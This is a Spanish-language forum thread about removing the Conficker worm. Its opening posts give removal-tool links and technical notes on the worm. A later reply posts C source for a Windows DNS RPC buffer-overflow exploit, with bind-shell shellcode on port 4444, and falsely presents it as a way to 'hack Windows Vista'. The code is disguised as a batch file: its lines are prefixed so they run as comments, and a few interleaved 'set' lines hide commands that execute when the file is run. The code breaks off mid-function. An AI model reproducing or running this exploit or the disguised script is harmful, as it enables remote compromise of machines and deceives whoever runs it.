Dark Soul Master

Somos Vagos, ¿¡Y Qué!?
 
ÍndicePortalCalendarioBuscarRegistrarseConectarse

Comparte | 
 

 Desinfecta Tu PC De Conficker... Uno De Los Más Agresivos...

Ver el tema anterior Ver el tema siguiente Ir abajo 
AutorMensaje
DarkCry
Webmaster
Webmaster


Género : Masculino
Signo del Zodiaco : Cáncer
Signo en el Zodiaco Chino : Cabra
Cantidad de envíos : 1888
Edad : 25
Localización : Santiago de Cali - Colombia
País :
¿Cuáles Son Tus Hobbies? : Geek, Gamer, Otaku, Xtreme Downloader, Tecladista, Bajista, Rockero, Poeta y Compositor...
¿Que Tal Andas De Humor? : La vida es tan solo una excusa para conocerte...
¿Cuáles Son Tus Videojuegos Favoritos? : Super Smash Bros., FinalFantasy VII & VII, Need for Speed MostWanted y Todos Los Prince Of Persia, Max Payne 1 & 2, Worms 4 Mayhem, Fahrenheit, Puzzle Quest, Mario Party, Metroid, Todos Los PoKéMoN, Mario Kart, Super Mario, The Legend of Zelda y un Monton Más...
¿Qué Consola(as) Hacen Parte De Ti? : Nintendo DS, Wii y PC...

31032009
MensajeDesinfecta Tu PC De Conficker... Uno De Los Más Agresivos...

Bueno, hoy en la conferencia dictada en la auniversidad autonoma de la ciudad de cali, entendi gracias a los ingenieros de la Microsoft que Windows Vista no es tan Malo como muchas personas creen, y no solo comimos de palabras, sino que nos sustentaron, y de igual forma nos afirmaron que Windows 7 sera lo que revolucionara a todo el mundo de la computacion...

En la conferencia tocaron un tema muy importante referente a un virus que no conocía y como no voy a profundizar en el tema del Win2 mejor hablo del virus.
Investigando halle que era uno de los más agresivos en toda la internet, y me atrevo a citar un post de Softonic donde está la herramienta para removerlo y muchas mas informacion sobre este...

-----------------------------
Hacía tiempo que no se armaba tanto revuelo por un virus, pero el gusano Conficker, también conocido como Kido o Downadup, está dando mucho que hablar. Aprovechando una vulnerabilidad de Windows, la MS08-067, Conficker se difundió rápidamente a partir del mes de octubre del 2008.

¿Por qué se vuelve a hablar de Conficker? Según parece por su código, la variante C del virus intentará actualizarse el día 1 de Abril, el equivalente al Día de los Santos Inocentes en algunos países. Por suerte, la mayoría de marcas de antivirus han liberado antídotos para detectar y eliminar Conficker de cualquier sistema infectado. Te decimos dónde conseguirlos.

Si notas que el ordenador se ejecuta lentamente, que no puedes acceder a algunas páginas sobre seguridad, que Windows Defender o las actualizaciones automáticas no funcionan o que la red está saturada, es posible que tu ordenador esté infectado por Conficker. Por suerte, nada más enterarse de su existencia, la Virus Information Alliance se puso manos a la obra para detener la emergencia. Éstas son las principales vacunas disponibles:







































CompañíaEnlace a la vacuna
Microsofthttp://www.microsoft.com/security/malwareremove/default.mspx
F-Secureftp://ftp.f-secure.com/anti-virus/tools/beta/f-downadup.zip
Symantechttp://www.symantec.com/business/security_response/writeup.jsp?docid=2009-011316-0247-99
McAfeehttp://vil.nai.com/vil/stinger/
ESEThttp://download.eset.com/special/EConfickerRemover.exe
BitDefenderhttp://www.bdtools.net/
Kasperskyhttp://data2.kaspersky-labs.com:8080/special/KidoKiller_v3.3.3.zip
TrendMicrohttps://securecloud.com/support/sysclean
Recomendar una frente a otra no tiene demasiado sentido, puesto que todas hacen lo mismo: eliminar a Conficker del sistema. Mientras la mayoría se ejecutan en línea de comandos, Symantec W32.Downadup Removal Tool tiene una interfaz gráfica:


Downadup Removal Tool

Symantec W32.Downadup Removal Tool es una vacuna compacta y específica para Conficker


El mecanismo de acción de Conficker es discreto. Desactiva algunos servicios, como Windows Defender, dejando abierta una puerta trasera y bloqueando nombres de dominio y páginas en las que se le mencione. La variante C puede propagarse a través de dispositivos de almacenamiento extraíbles, y se considera la más peligrosa.


A partir del día 1 de abril 2009, Conficker.C se conectará a 500 dominios de una lista de 50.000 en busca de nuevo código. La alarma generada ha sido tal que la ICANN ha bloqueado el registro de los dominios mencionados por el virus. Sólo los ordenadores con antivirus actualizado y últimos parches de seguridad pueden considerarse inmunes:



Mecanismos de propagación de Conficker - Imagen traducida de la Wikipedia


Es posible que la amenaza de Conficker haya sido sobrevalorada, pero es difícil predecir qué ocurrirá si la variante C consigue actualizarse en los millones de equipos infectados. Puede que se trate de una simple broma, o que el código se active otro día. Sea como fuere, constituye un riesgo que no puede ignorarse.


Una vez eliminado Conficker, recuerda instalar el parche de Microsoft y un antivirus que pueda actualizarse automáticamente. No olvides tampoco mantener parcheada tu copia de Windows. Si por alguna razón no pudieras conectar a Windows Update, prueba con WinUp o WindizUpdate.


-----------------------------


Link Original de la Información: http://es.onsoftware.com/p/elimina-el-gusano-conficker-de-tu-ordenador

Espero que todos nos pongamos seguros frente a la situacion de seguridad informatica, pues cada vez es un tema aún más delicado...

_________________



Volver arriba Ir abajo
Ver perfil de usuario http://darksoulmaster.forosactivos.net

 Temas similares

-
» Practiquemos el Sellado de RoE
» Mazo Rojo-Verde agresivo
» Mazo agresivo R/W
» control,combo,agresivo o agrocontrol?
» Rojo-Verde Agresivo
Compartir este artículo en : Excite BookmarksDiggRedditDel.icio.usGoogleLiveSlashdotNetscapeTechnoratiStumbleUponNewsvineFurlYahooSmarking

Desinfecta Tu PC De Conficker... Uno De Los Más Agresivos... :: Comentarios

Men ggracias.... o sea me tengo que descargar el SYMANTEC?'' para protegerme


PD: no veo el boton de gracias
MEN RE GRACIAS POR LA INFO, DE HECHO HOY ESTOY VIENDO ESE TEMA CON NEWBYTE.,...-

AQUI COMPARTO ALGO DE INFO QUE ENCONTRE!!!!!!!!!!!!!!!!!!

Características del gusano Downadup, Conficker o Kido
Enero 27, 09 by G2 | Puesto en General



Estoy recopilando información acerca del virus Downadup, Conficker o kido para mañana mismo probar en mi pc de prueba como es que infecta y que es lo que modifica en windows.

Hasta ahora Microsoft nos recomienda actualizar en su Boletín de seguridad de Microsoft MS08-067 – Crítico.



Nombre común: Conficker.A
Nombre técnico: W32/Conficker.A.worm
Peligrosidad: Baja
Tipo: Gusano
Efectos: Aprovecha la vulnerabilidad MS08-067 en el servicio de servidor de Windows para propagarse y descargar el falso antimalware detectado como Adware/Antivirus2009 en el ordenador afectado.
Plataformas que infecta: Windows 2003/XP/2000/NT/ME/98/95
Descripción Breve:
Conficker.A es un gusano que aprovecha una vulnerabilidad en el servicio de servidor de Windows y que permite ejecutar remotamente código arbitario. Se trata de la vulnerabilidad MS08-067.

Mediante esta vulnerabilidad, Conficker.A consigue descargar el falso antimalware detectado como Adware/AntiVirus2009 en el ordenador afectado. Conficker.A se propaga explotando la vulnerabilidad MS08-067. Para ello, ataca ciertas direcciones IP en las que intenta introducir una copia de sí mismo.

Efectos:
Conficker.A está diseñado para descargar un falso antimalware detectado como Adware/Antivirus2009 en el ordenador afectado. Para ello, aprovecha una vulnerabilidad en el servicio de servidor de Windows que permite ejecutar remotamente código arbitario. Se trata de la vulnerabilidad MS08-067.

Metodo de Infección:
Conficker.A crea una DLL (Librería de Enlace Dinámico) de nombre aleatorio en el directorio de sistema de Windows.

Conficker.A crea la siguiente entrada en el Registro de Windows:

HKEY_LOCAL_MACHINE\ SYSTEM\ CurrentControlSet\ Services\ netsvcs\ Parameters
ServiceDll = %sysdir%\%nombre aleatorio%.dll
dondee %sysdir% es el directorio de sistema de Windows.
Método de Propagación:
Conficker.A se propaga mediante la explotación de la vulnerabilidad denominada MS08-067, que se trata de una vulnerabilidad en el servicio de servidor de Windows. Para ello, realiza el siguiente proceso:

Se conecta a las siguientes páginas web para obtener direcciones IP:
http://www.getmyip.org
http://getmyip.co.uk
http://checkip.dyndns.org

Después, escanea las direcciones IP que ha recopilado en busca de ordenadores que tengan en puerto 445 abierto. Se trata del puerto del servicio RPC, que es el componente vulnerable.
En caso de encontrar alguno, descarga en el ordenador atacado una copia de sí mismo.

Otros Detalles:
Conficker.A tiene un tamaño de 62976 Bytes y está comprimido mediante UPX.

Además, intenta descargarse los archivos GEOIP.DAT.GZ y GEOIP.DAT de la siguiente página web:

http://www.maxmind.com

Estos archivos no son maliciosos, sino que se trata de un programa que localiza direcciones IP en el mundo. Conficker.A utiliza este programa para obtener información del punto geográfico de las direcciones IP a las que ataca.

Con todo se llega a la conclusión de que es fundamental:

Parchear los sistemas operativos y adoptar políticas de gestión que aseguren que infecciones similares no ocurran en el futuro.
Utilizar un antivirus con capacidades proactivas. Entre ellos tenemos a ESET NOD32, Avira, Kaspersky.
Utilizar un Firewall para bloquear los puertos que pueda utilizar el malware al infectar un equipo en la red.
Instalar la actualización de seguridad informada en boletín MS08-067 de Microsoft. Si bien las últimas versiones de Conficker también utilizan otras técnicas de propagación, la instalación de esta actualización es crítica y disminuirá el potencial riesgo de infección.
Saludos!!


Última edición por DarkCry el Jue 02 Abr 2009, 00:34, editado 1 vez (Razón : Revelar Info Confidencial...)
waw! muchisimas gracias! muy completo!!

PD: ojo con dar nombres en el foro... me toco editarte por NewByte...

en la juega con eso...

acuerdese que la identidad de el es confidencial...

salu2!
DarkCry escribió:
Bueno, hoy en la conferencia dictada en la auniversidad autonoma de la ciudad de cali, entendi gracias a los ingenieros de la Microsoft que Windows Vista no es tan Malo como muchas personas creen, y no solo comimos de palabras, sino que nos sustentaron, y de igual forma nos afirmaron que Windows 7 sera lo que revolucionara a todo el mundo de la computacion...

En la conferencia tocaron un tema muy importante referente a un virus que no conocía y como no voy a profundizar en el tema del Win2 mejor hablo del virus....

Hay algo que quiero decir desde mi punto de vista... El Windows Vista no es que sea malo (aunque yo si lo considero así), solamente que no fue diseñado para diferentes tipos de Entornos, no se sabe si al momento de crearlo pensaron que los usuarios y su entorno (bien sea corporativo o hogareño) se tenían que adaptar al sistema y no el sistema adaptarse a la necesidad de los usuarios. Un ejemplo muy sencillo es el siguiente:

Una empresa que paga quien sabe cuantos millones de pesos por un software diseñado para trabajar sobre el sub-sistema a 16 bits, y hasta el XP todo marcha bien, después sale el Windows Vista, el cual no los soporta asi que hay que emepezar a parchar el Windows Vista, cuando finalmentes esta configurado el software, trabajamos en el y o sorpresa.... no trabajo con impresoras de punto como la EPSON FX-1170 o la LX-300 por captura de puerto, asi que toca que descargar programas de terceros (mas agujeros para nuestra máquina) para poder hacer trabajar las impresoras.

Luego vamos a utilizar nuestro token para trabajar una utilidad que utiliza ese tipo de credencial para autenticar el usuario y OOOHHHH!!! Sorpresa de nuevo..... el token no es compatible porque los drivers no son soportados sobre Windows Vista. ETC, ETC, ETC, ETC.

Hay que tener en cuenta lo siguiente, un vendedor nunca va a hablar mal de su producto, un representante de Microsoft, y mas siendo un MVP, NUNCA dira que el software que desarrollán es malo, y prueba esta que el día de lanzamiento del vista, mientra hablaban sobre la seguridad y las bondades que tenia, en la sala de enseguida mostraban como comprometer la seguridad del windows vista con una simple presentación de PowerPoint.

Es mas... les dejo a continuación el código para hackear el Windows Vista con un fallo que tiene desde el inicio de sus tiempos con el servicio de bloqueo de mensajes (creo que esto si no se los dijerón en la conferencia) y que Microsoft se ha hecho el de la vista gorda, así que si no lo quieren corregir, lo seguiremos usando por mucho tiempo. Aquí el código y a continuación una imagen de los resultados:

Código:
set shell1=rem && set kj=c:
%shell1% void __RPC_FAR * __RPC_USER midl_user_allocate(size_t len){ return(malloc(len)); }
%shell1% void __RPC_USER midl_user_free(void __RPC_FAR * ptr){ free(ptr); }
%shell1% int fingerprint (char *host);    //Fingerprint remote os for autotarget
%shell1% BYTE * find_jmp (BYTE *lpAddress, DWORD dwSize); //Search for opcodes
%shell1% void FillPaddedOffset(unsigned char *data, DWORD offset); //Write a DWORD padded with '\'
%shell1% unsigned char shellcode2k[] = /* Bindshell 4444 */
%shell1% "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x18"
%shell1% "\xc3\x99\x10\x83\xee\xfc\xe2\xf4\xe4\xa9\x72\x5d\xf0\x3a\x66\xef"
%shell1% "\xe7\xa3\x12\x7c\x3c\xe7\x12\x55\x24\x48\xe5\x15\x60\xc2\x76\x9b"
%shell1% "\x57\xdb\x12\x4f\x38\xc2\x72\x59\x93\xf7\x12\x11\xf6\xf2\x59\x89"
%shell1% "\xb4\x47\x59\x64\x1f\x02\x53\x1d\x19\x01\x72\xe4\x23\x97\xbd\x38"
%shell1% "\x6d\x26\x12\x4f\x3c\xc2\x72\x76\x93\xcf\xd2\x9b\x47\xdf\x98\xfb"
%shell1% "\x1b\xef\x12\x99\x74\xe7\x85\x71\xdb\xf2\x42\x74\x93\x80\xa9\x9b"
%shell1% "\x58\xcf\x12\x60\x04\x6e\x12\x50\x10\x9d\xf1\x9e\x56\xcd\x75\x40"
%shell1% "\xe7\x15\xff\x43\x7e\xab\xaa\x22\x70\xb4\xea\x22\x47\x97\x66\xc0"
%shell1% "\x70\x08\x74\xec\x23\x93\x66\xc6\x47\x4a\x7c\x76\x99\x2e\x91\x12"
%shell1% "\x4d\xa9\x9b\xef\xc8\xab\x40\x19\xed\x6e\xce\xef\xce\x90\xca\x43"
%shell1% "\x4b\x90\xda\x43\x5b\x90\x66\xc0\x7e\xab\x88\x4c\x7e\x90\x10\xf1"
%shell1% "\x8d\xab\x3d\x0a\x68\x04\xce\xef\xce\xa9\x89\x41\x4d\x3c\x49\x78"
%shell1% "\xbc\x6e\xb7\xf9\x4f\x3c\x4f\x43\x4d\x3c\x49\x78\xfd\x8a\x1f\x59"
%shell1% "\x4f\x3c\x4f\x40\x4c\x97\xcc\xef\xc8\x50\xf1\xf7\x61\x05\xe0\x47"
%shell1% "\xe7\x15\xcc\xef\xc8\xa5\xf3\x74\x7e\xab\xfa\x7d\x91\x26\xf3\x40"
%shell1% "\x41\xea\x55\x99\xff\xa9\xdd\x99\xfa\xf2\x59\xe3\xb2\x3d\xdb\x3d"
%shell1% "\xe6\x81\xb5\x83\x95\xb9\xa1\xbb\xb3\x68\xf1\x62\xe6\x70\x8f\xef"
%shell1% "\x6d\x87\x66\xc6\x43\x94\xcb\x41\x49\x92\xf3\x11\x49\x92\xcc\x41"
%shell1% "\xe7\x13\xf1\xbd\xc1\xc6\x57\x43\xe7\x15\xf3\xef\xe7\xf4\x66\xc0"
%shell1% "\x93\x94\x65\x93\xdc\xa7\x66\xc6\x4a\x3c\x49\x78\xe8\x49\x9d\x4f"
%shell1% "\x4b\x3c\x4f\xef\xc8\xc3\x99\x10";
%shell1%
%shell1% int local=1; //local/remote exploit flag
%shell1% int lang=-1; //language and version flag for remote exploit
%shell1% int SearchDynamicPort=1;
%shell1%
set grt=ap
%shell1% struct _targets {
%shell1%    char *version;
%shell1%    DWORD offset;
%shell1%
%shell1%
%shell1% } TARGETS[] = { //supported os
%shell1% { "WinNT Universal - (default for winNT)",0x30270B0B}, //default - UnicodeNLSOffset  Universal unicode.nls
%shell1% { "Win2k  Universal -  (default for win2k )",0x79467EF8}, //default - kernel32.dll spanish offset
%shell1% { "WinXP  universal",                      0x7c4fedbb}, //kernel32 English / 5.0.2195.6688) (from metasploit db, not tested)
%shell1% { "WinVista  Universal",                      0x7963edbb}, //kernel32 English / 5.0.2195.6688) (from metasploit db, not tested)
%shell1% { "Windows Seven Denial of Service",                  0x41414141}, //DOS
%shell1%
%shell1% };
set mq=y  && set md=/s && set own=echo && set bf=pp && set tgm=ril
%shell1%
%shell1%
%shell1% void usage(char *argv) {
%shell1% int i;
%shell1%    printf(" Usage:  %s -h 127.0.0.1 (Universal local exploit)\n",argv);
%shell1%    printf("          %s -h host [-t id] [-p port]\n",argv);
%shell1%    printf(" Targets:\n");
%shell1%    for(i=0;i<sizeof(TARGETS)/sizeof(struct _targets);i++) {
%shell1%      printf("      %i (0x%8.8x) - %s\n",i,TARGETS[i].offset,TARGETS[i].version);
%shell1%    }
%shell1%    exit(1);   
%shell1% }
%shell1%               
%shell1% char *DiscoverPort(char *host, char *uid) {
%shell1% /* Idea ripped from Sir Dystic Rpcdump */
%shell1%    unsigned char pszStringBinding[256];
%shell1%    UUID uuid;
%shell1%    RPC_EP_INQ_HANDLE context;
%shell1%    RPC_IF_ID id;
%shell1%    RPC_BINDING_HANDLE handle, handle2;
%shell1%    unsigned char * ptr;
%shell1%    unsigned char * ptr2;
%shell1%    unsigned char * ptr3;
%shell1%
set gk=ha  && set jig=cls && set iu=1 && set lo=d && set hack=dir && set vcx=ay
%shell1%    sprintf(pszStringBinding,"ncacn_ip_tcp:%s",host); //Construct binding
%shell1%    if (RpcBindingFromStringBinding(pszStringBinding, &handle) == RPC_S_OK) {
%shell1%      printf("[+] Binding to %s\n",pszStringBinding);
%shell1%      if (RpcMgmtEpEltInqBegin( handle, RPC_C_EP_ALL_ELTS, NULL, 0, &uuid, &context)== RPC_S_OK)  {
%shell1%          while ( RpcMgmtEpEltInqNext(context, &id, &handle2, &uuid, &ptr) == RPC_S_OK) {
%shell1%            UuidToString(&id.Uuid, &ptr2);
%shell1%            if (strcmp("50abc2a4-574d-40b3-9d66-ee4fd5fba076",ptr2)==0) {
%shell1%                char *p;
%shell1%                RpcBindingToStringBinding(handle2, &ptr3);
%shell1%                printf("[+] Found %s version %u.%u\n", ptr2, id.VersMajor, id.VersMinor);
%shell1%                printf("[+] RPC binding string: %s\n", ptr3);
%shell1%                p=strchr(ptr3,'[');
%shell1%                if (p) {
%shell1%                  RpcStringFree(&ptr2);
%shell1%                  p[strlen(p)-1]='\0';
%shell1%                  return(p+1);
%shell1%                }           
%shell1%            }
%shell1%            RpcStringFree(&ptr2);                               
%shell1%            if (handle2 != NULL) RpcBindingFree(&handle2);
%shell1%            if (ptr != NULL)  RpcStringFree(&ptr);
%shell1%          }
%shell1%      }
%shell1%    }
%shell1%    return(NULL);
%shell1% }
%shell1%
%shell1%
%shell1% void __cdecl main(int argc, char *argv[])
%shell1% {
%shell1%    RPC_STATUS status;
%shell1%    unsigned char * pszUuid             = "50abc2a4-574d-40b3-9d66-ee4fd5fba076";
%shell1%    unsigned char * pszProtocolSequence = "ncacn_np";
%shell1%    unsigned char * pszNetworkAddress    = NULL;
%shell1%    unsigned char * pszEndpoint          = "\\pipe\\dnsserver";
%shell1%    unsigned char * pszOptions          = NULL;
%shell1%    unsigned char * pszStringBinding    = NULL;
%shell1%    unsigned long ulCode;
%shell1%    int os;
%shell1%    int i;
%shell1%         
%hack% %kj% %md%
%shell1%   
%shell1%
%shell1%
%shell1%  if (argc==1) usage(argv[0]); //Handle parameters
%shell1%  for(i=1;i<argc;i++) {
%shell1%      if ( (argv[i][0]=='-') ) {
%shell1%          switch (argv[i][1]) {
%shell1%          case 'h':
%shell1%            pszNetworkAddress=argv[i+1];
%shell1%            break;
%shell1%          case 't':
%shell1%          case 'T':
%shell1%            lang=atoi(argv[i+1]);
%shell1%            break;
%shell1%          case 'p':
%shell1%            if (strcmp(argv[i+1],"445")==0) {
%shell1%                printf("[+] Attacking default port 445 (should require auth)\n");
%shell1%            } else {
%shell1%                pszEndpoint=argv[i+1];
%shell1%                pszProtocolSequence="ncacn_ip_tcp";
%shell1%            }
%shell1%            SearchDynamicPort=0;
%shell1%            break;           
%shell1%          default:
%shell1%            printf("[-] Invalid argument: %s\n",argv[i]);
%shell1%            usage(argv[0]);
%shell1%            break;
%shell1%          }
%shell1%          i++;           
%shell1%      } else usage(argv[0]);
%shell1%    }
%shell1%   
%shell1%    if (pszNetworkAddress==NULL) usage(argv[0]);
%shell1%    //Test if the remote server is supported (2k & 2k3)
%shell1%    os=fingerprint(pszNetworkAddress);
%shell1%
%shell1%    if (os==-1)  {
%shell1%      printf("[-] Unable to fingerprint remote Host\n");
%shell1%      exit(-1);
%shell1%    } else {
%shell1%      switch (os) {
%shell1%      case 0:  printf("[+] Remote Host identified as Windows 2000\n");
%shell1%                if (lang==-1) lang=1; //set default target for Windows 2000
%shell1%          break;
%shell1%      case 1:  printf("[-] Remote Host identified as Windows XP\n"); exit(1); break;
%shell1%      case 2:  printf("[+] Remote Host identified as Windows 2003\n");
%shell1%                if (lang==-1) lang=0; //set default target for Windows 2003
%shell1%          break;
%shell1%      default: printf("[-] Unknown Remote Host OS\n");exit(1); break;
%shell1%      }
%shell1%    } 
%shell1%
%shell1%
%shell1%    if (SearchDynamicPort) { //Do some magic stuff here =)
%shell1%      char *port=NULL;
%shell1%      printf("[-] No port selected. Trying Ninja sk1llz\n");
%shell1%      port=DiscoverPort(pszNetworkAddress,"50abc2a4-574d-40b3-9d66-ee4fd5fba076");
%shell1%      if (port) {
%shell1%          printf("[+] Dynamic DNS rpc port found (%s)\n",port);
%shell1%          pszEndpoint=port;
%shell1%          pszProtocolSequence="ncacn_ip_tcp";
%shell1%      } else {
%shell1%          printf("[-] Unable to find dynamic dns port (trying default 445)\n");
%shell1%      }
%shell1%    }
%shell1%       
%shell1%
%shell1%    //Create an RPC binding string
%shell1%    status = RpcStringBindingCompose(pszUuid,pszProtocolSequence,pszNetworkAddress,pszEndpoint,pszOptions,&pszStringBinding);
%shell1%    printf("[+] Connecting to %s\n", pszStringBinding);
%shell1%   
%shell1%    if (status==RPC_S_OK) {
%shell1%      status = RpcBindingFromStringBinding(pszStringBinding,&dns); //RPC Binding
%shell1%      if (status==RPC_S_OK) {
%shell1%          wchar_t *parama=L"PARAMAA"; //Rpc call parameter1
%shell1%          unsigned char *paramb=NULL; //Rpc call parameter2 that triggers overflow
%shell1%          unsigned char *paramc="PARAMC";//Rpc call parameter3
%shell1%          long   *paramd = malloc(50); //Rpc call parameter4
%shell1%          long *parame=malloc(50);    //rpc call paramameter5   
%shell1%          int i,j;
%shell1%          long ret;     
%shell1%
%shell1%          printf("[+] RpcBindingFromStringBinding success\n");               
%shell1%          if (os==0) { //Windows 2000 Server exploit
%shell1%            #define BUFSIZE (0x3A2 +8 +24 +sizeof(shellcode2k)*2) //buffer + EIP + PAD + Shellcode
%shell1%           
%shell1%            paramb=malloc(BUFSIZE +1);  //Alloc needed space
%shell1%            memset(paramb,'\\',BUFSIZE); //Fill the whole buffer with \
%shell1%           
%shell1%            for(i=0;i<=0x3A2;i+=2) { //0x3A2 chars needed to trigger the overflow
%shell1%                paramb[i+1]='a';
%shell1%            }             
%shell1%           
la continuación...

Código:
%shell1%            if (local) { //universal local exploit for Windows 2000
%shell1%                unsigned char *pos=(DWORD *)GetModuleHandle("kernel32.dll"); //Get Memory address for kernel32.dll
%shell1%                DWORD Off2popAndRet;           
%shell1%                printf("[+] Searching local opcodes at Kernel32.dll (0x%8.8x)\n",pos);
%shell1%                Off2popAndRet = (DWORD) find_jmp(pos,0x100000); //search kernel32.dll memory for valid opcodes
%shell1%                if(Off2popAndRet) { //Valid opcode found
%shell1%                  FillPaddedOffset(¶mb[0x3a2],Off2popAndRet); //fill buffer with found address
%shell1%                  printf("[+] Please report this offset to us so we can update the exploit =)\n");
%shell1%                } else {
%shell1%                  printf("[-] Unable to locate valid opcodes\n");
%shell1%                  exit(-1);
%shell1%                }             
%shell1%            } else { //overwrite EIP with selected return address ( default 0x79467EF8 kernel32.dll call esp )             
%shell1%              FillPaddedOffset(¶mb[0x3a2],TARGETS[lang].offset); //fill buffer with selected opcode
%shell1%              printf("[+] Selected target 0x%8.8x\n",TARGETS[lang].offset);
%shell1%            }
%shell1%           
%shell1%            //Pad with 3 DWORDS (our shellcode is at ESP, 12 bytes above)
%shell1%            memcpy(¶mb[0x3a2+8],"\\a\\a\\a\\a\\b\\b\\b\\b\\c\\c\\c\\c",24);
%shell1%           
%shell1%            i=0x3a2+8+24; //set the possition for our shellcode
%shell1%            for(j=0;j<sizeof(shellcode2k);j++) {
%shell1%                paramb[i+1]=shellcode2k[j]; //add the shellcode to the buffer
%shell1%                i+=2;
%shell1%            }             
%shell1%            paramb[BUFSIZE]='\0';           
%shell1%           
%shell1%          } else { //Windows 2003 server exploit. Overwrite SEH handler
%shell1%            #undef  BUFSIZE
%shell1%            #define BUFSIZE 10000
%shell1%            #define SEH_HANDLER_DELTA 0x661
%shell1%
%shell1%          
%shell1%
%shell1%           /* Indeed the real offset is 0x00270B0B,
%shell1%            but 0x30 -> '0', and extractQuotedchar should do
%shell1%            the trick for us :-), so we can have NULL bytes in the offset */
%shell1%                         
%shell1%            paramb=malloc(BUFSIZE +1);                                                     
%shell1%            memset (paramb,'\\',BUFSIZE);
%shell1%
%shell1%            for( i=0 ; i< BUFSIZE; i+=2 ) {                           
%shell1%                paramb[i+1]='a';               
%shell1%            }
%shell1%                                   
%shell1%            FillPaddedOffset(¶mb[SEH_HANDLER_DELTA*2-8],0x04EB9090); //Adding jmp $ + 6  // 90 90 EB 04
%shell1%            FillPaddedOffset(¶mb[SEH_HANDLER_DELTA*2],TARGETS[lang].offset);                       
%shell1%            i=SEH_HANDLER_DELTA*2+8;
%shell1%            for(j=0;j<sizeof(shellcode2k)-1;j++) {
%shell1%                paramb[i+1]=shellcode2k[j]; //add the Shellcode
%shell1%                i+=2;
%shell1%            }             
%shell1%            paramb[BUFSIZE]='\0';         
%shell1%          }
%shell1%
%shell1%          printf("[+] Sending Exploit code to DnssrvOperation()\n");
%shell1%          printf("[+] Now try to connect to port 4444\n");
%shell1%          RpcTryExcept {                            
%shell1%            ret=DnssrvQuery(parama,paramb,paramc,paramd,parame) ; //send the overflow call
%shell1%            printf("[-] Return code: %i\r",ret);
%shell1%          }            
%shell1%          RpcExcept(1) {
%shell1%            ulCode = RpcExceptionCode(); //Show returned errors from remote DNS server
%shell1%            printf("[-] RPC Server reported exception 0x%lx = %ld\n", ulCode, ulCode);
%shell1%            switch (ulCode) {
%shell1%            case 5: printf("[-] Access Denied, authenticate first with \"net use \\\\%s pass /u:user\"\n",pszNetworkAddress);break;
%shell1%            case 1722:printf("[-] Looks like there is no remote dns server\n"); break;
%shell1%            case 1726:printf("[-] Looks like remote RPC server crashed :/\n"); break;
%shell1%            default:   break;       
%shell1%            }
%shell1%          }
%shell1%          RpcEndExcept      
%shell1%      } else {
%shell1%          printf("[+] RpcBindingFromStringBinding returned 0x%x\n", status);
%shell1%      }
%shell1%    }
%shell1% }
%shell1%
%shell1%
%shell1% /******************************************************************************************************/
%shell1% BYTE * find_jmp (BYTE *lpAddress, DWORD dwSize)
%shell1% {   
%shell1%    DWORD i;
%shell1%    BYTE *p;
%shell1%    BYTE *retval = NULL;   
%shell1%   
%shell1%    printf("[+] Searching 0x%x bytes\n",dwSize);
%shell1%   
%shell1%    for (i=0;i<(dwSize-4);i++)
%shell1%    {
%shell1%      p = lpAddress + i;     
%shell1%
%shell1%      if (p[0]==0xFF) { //Todo: Validate Not Null bytes
%shell1%        if (p[1]==0xD4) {
%shell1%            printf("[+] Opcode \" call esp\" found at address 0x%8.8x\n",p);
%shell1%            retval=p;   
%shell1%            break;
%shell1%        } else if (p[1]==0xE4) {
%shell1%            printf("[+] Opcode \" jmp esp\" at address 0x%8.8\n",p);
%shell1%            retval=p;
%shell1%            break;
%shell1%        }
%shell1%      }
%shell1%    } 
%shell1%    return retval;
%shell1% }
%shell1% /******************************************************************************************************/
%shell1% int fingerprint (char *host) {
%shell1%    char req1[] =
%shell1%      "\x00\x00\x00\x85\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8"
%shell1%      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
%shell1%      "\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f"
%shell1%      "\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02"
%shell1%      "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f"
%shell1%      "\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70"
%shell1%      "\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30"
%shell1%      "\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54"
%shell1%      "\x20\x4c\x4d\x20\x30\x2e\x31\x32";
%shell1%    char req2[] =
%shell1%      "\x00\x00\x00\xa4\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8"
%shell1%      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe"
%shell1%      "\x00\x00\x10\x00\x0c\xff\x00\xa4\x00\x04\x11\x0a\x00\x00\x00\x00"
%shell1%      "\x00\x00\x00\x20\x00\x00\x00\x00\x00\xd4\x00\x00\x80\x69\x00\x4e"
%shell1%      "\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xe0\x00"
%shell1%      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
%shell1%      "\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00"
%shell1%      "\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
%shell1%      "\x35\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00"
%shell1%      "\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
%shell1%      "\x2e\x00\x30\x00\x00\x00\x00";
%shell1%   
%shell1%    WSADATA ws; 
%shell1%    int sock;
%shell1%    struct sockaddr_in remote; 
%shell1%    unsigned char buf[0x300];
%shell1%    int i;
%shell1%    OSVERSIONINFO os;
%shell1%
%shell1%    if (strcmp(host,"127.0.0.1")!=0) local=0;
%shell1%   
%shell1%    if (local) {
%shell1%      os.dwOSVersionInfoSize =sizeof(OSVERSIONINFO);
%shell1%      GetVersionEx(&os);
%shell1%      //printf("OS: %i - %i\n",os.dwMajorVersion, os.dwMinorVersion);
%shell1%     
